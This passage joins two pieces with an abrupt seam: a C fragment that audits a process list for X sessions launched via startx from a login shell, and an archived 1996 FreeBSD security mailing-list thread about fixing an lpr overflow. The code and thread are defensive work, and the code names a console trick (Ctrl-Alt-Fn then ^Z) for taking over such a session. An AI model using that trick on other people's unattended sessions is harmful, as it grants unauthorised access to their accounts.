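/* A login shell shows up as "-csh", "-sh", ...; a shell running a script
 * (e.g. "sh /usr/X11R6/bin/startx") has no leading dash. */
static int is_login_shell(const char *cmd)
{
    static const char *shells[] = { "sh", "csh", "tcsh", "bash", "ksh", "zsh" };
    size_t i;
    if (cmd[0] != '-')
        return 0;
    for (i = 0; i < sizeof shells / sizeof shells[0]; i++)
        if (strcmp(cmd + 1, shells[i]) == 0)
            return 1;
    return 0;
}

static int is_x_server(const char *cmd)
{
    return basename_is(cmd, "X") || basename_is(cmd, "XFree86") || basename_is(cmd, "Xorg");
}

/* For the X server with pid xpid, walk the parent chain up to init and return
 * the pid of the first login shell found, or 0 when the session was exec'd
 * (no shell left to ^Z back into) or xpid is not an X server. */
int login_shell_behind_x(const struct proc *t, int n, int xpid)
{
    const struct proc *p = find_proc(t, n, xpid);
    int hops = 0;
    if (!p || !is_x_server(p->cmd))
        return 0;
    for (p = find_proc(t, n, p->ppid); p && p->pid > 1 && hops < MAXPROCS;
         p = find_proc(t, n, p->ppid), hops++)
        if (is_login_shell(p->cmd))
            return p->pid;
    return 0;
}

/* Constructed sample listing, not real ps output: one xdm session, one startx
 * run from a login shell (the exposed case), one exec'd startx. */
static const char SAMPLE_PS[] =
    "  PID  PPID COMMAND\n"
    "    1     0 /sbin/init\n"
    "  900     1 xdm\n"
    "  910   900 /usr/X11R6/bin/XFree86 :1\n"
    " 1000     1 -csh\n"
    " 1020  1000 sh /usr/X11R6/bin/startx\n"
    " 1030  1020 xinit /home/wes/.xinitrc -- /usr/X11R6/bin/X :0\n"
    " 1040  1030 /usr/X11R6/bin/XFree86 :0\n"
    " 2000     1 login\n"
    " 2020  2000 sh /usr/X11R6/bin/startx\n"
    " 2030  2020 xinit -- :2\n"
    " 2040  2030 /usr/X11R6/bin/XFree86 :2\n";

int sample_count(void)
{
    struct proc t[MAXPROCS];
    return parse_ps(SAMPLE_PS, t, MAXPROCS);
}

int sample_shell_for(int xpid)
{
    struct proc t[MAXPROCS];
    int n = parse_ps(SAMPLE_PS, t, MAXPROCS);
    return login_shell_behind_x(t, n, xpid);
}

int main(void)
{
    struct proc table[MAXPROCS];
    int n = parse_ps(SAMPLE_PS, table, MAXPROCS), i;
    for (i = 0; i < n; i++) {
        int shell = login_shell_behind_x(table, n, table[i].pid);
        if (shell)
            printf("X server pid %d can be regained from login shell pid %d (Ctrl-Alt-Fn, then ^Z)\n",
                   table[i].pid, shell);
    }
    return 0;
}
```

On a live system the same logic applies to the output of `ps -axo pid,ppid,command`; only the session on display :0, whose chain still contains `-csh`, is reported, while the xdm session and the exec'd one are clean.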
From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Warner Losh cc: security@FreeBSD.ORG Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Fri, 25 Oct 1996, Warner Losh wrote: > Here's a new LPR threat. I've come up with a patch that I'd like > others on this list to vet. It is different than the one suggested by > the author. I think it is better, but haven't thought through all the > implications of it yet. > > Comments? I don't think it is worthwhile to bother with dynamic memory allocation for this. I think it is just as clean to simply exit, perhaps logging an error, if the string is too long. From owner-freebsd-security Fri Oct 25 16:47:47 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA05610 for security-outgoing; Fri, 25 Oct 1996 16:47:47 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id QAA05596 for ; Fri, 25 Oct 1996 16:47:43 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vGvyT-0002ew-00; Fri, 25 Oct 1996 17:47:37 -0600 To: Marc Slemko Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit Cc: security@freebsd.org In-reply-to: Your message of "Fri, 25 Oct 1996 17:37:20 MDT." References: Date: Fri, 25 Oct 1996 17:47:36 -0600 
From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Marc Slemko writes: : I don't think it is worthwhile to bother with dynamic memory allocation : for this. I think it is just as clean to simply exit, perhaps logging an : error, if the string is too long. Agreed. The more I thought about it, the more I realized that it was silly to allow long lines only here. And more error prone, since my patch actually introduced a new core dump :-(. I've committed the OpenBSD fix for this problem, btw, which silently truncates. Don't see a whole lot of reason for exiting in this case, but I have trouble articulating why. I can improve upon the OpenBSD fix, but at least that is one less lpr hole that is in FreeBSD. Warner From owner-freebsd-security Fri Oct 25 17:10:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA08580 for security-outgoing; Fri, 25 Oct 1996 17:10:29 -0700 (PDT) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id RAA08573 for ; Fri, 25 Oct 1996 17:10:23 -0700 (PDT) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id SAA01832; Fri, 25 Oct 1996 18:10:19 -0600 (MDT) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id SAA28215; Fri, 25 Oct 1996 18:03:20 -0600 (MDT) Date: Fri, 25 Oct 1996 18:03:19 -0600 (MDT) 
From: Marc Slemko X-Sender: marcs@alive.ampr.ab.ca To: Warner Losh cc: security@FreeBSD.ORG Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Fri, 25 Oct 1996, Warner Losh wrote: > I've committed the OpenBSD fix for this problem, btw, which silently > truncates. Don't see a whole lot of reason for exiting in this case, > but I have trouble articulating why. I can improve upon the OpenBSD > fix, but at least that is one less lpr hole that is in FreeBSD. You can argue both ways, but I really don't think it matters too much. I do, however, really think that the idea of logging things like this should be pursued; either someone is trying to break in, which is bad, or someone is really trying to do something odd, in which case it would be nice to know why it wasn't working as it should. I would also suggest that perhaps it is even worth scrapping lpr entirely. There are numerous other security changes in the OpenBSD source tree, and even then I would bet there are still other problems with the code. Has anyone looked at LPRng in depth? (ftp://dickory.sdsu.edu/pub/LPRng/) I have serious doubts that the current BSD print system (i.e. lpr & friends) is going to be made secure any time this century. Perhaps a wholesale replacement is in order? There is, of course, the disadvantage of becoming non-standard; LPRng uses different config files and works differently, so it isn't just a drop-in replacement. 
From owner-freebsd-security Fri Oct 25 17:17:44 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA09043 for security-outgoing; Fri, 25 Oct 1996 17:17:44 -0700 (PDT) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id RAA09022 for ; Fri, 25 Oct 1996 17:17:34 -0700 (PDT) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vGwQt-0002j6-00; Fri, 25 Oct 1996 18:16:59 -0600 To: Marc Slemko Subject: Re: Vadim Kolontsov: BoS: Linux & BSD's lpr exploit Cc: security@freebsd.org In-reply-to: Your message of "Fri, 25 Oct 1996 18:03:19 MDT." References: Date: Fri, 25 Oct 1996 18:16:59 -0600 
From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message Marc Slemko writes: : You can argue both ways, but I really don't think it matters too much. I : do, however, really thinks that the idea logging things like this should : be pursued; either someone is trying to breakin, which is bad, or someone : is really trying to do something odd, in which case it would be nice to : know why it wasn't working as it should. I was thinking that too. There are a lot of fixes in OpenBSD, and many of them are begging for a syslog to alert the system admin that you might be under attack. : I would also suggest that perhaps it is even worth scrapping lpr entirely. : There are numerous other security changes in the OpenBSD source tree, and : even then I would bet there are still other problems with the code. Yes. There are a boatload. And a bunch more just went in today. Many of them are very defensive programming, and seem to be somewhat sane. I'm not sure how many of them should have some kind of warning generated when they are triggered. It all depends on how paranoid you are :-). I don't have a good answer for that. At the very least OpenBSD will be much less likely to be breached, which is likely the most important thing. Warner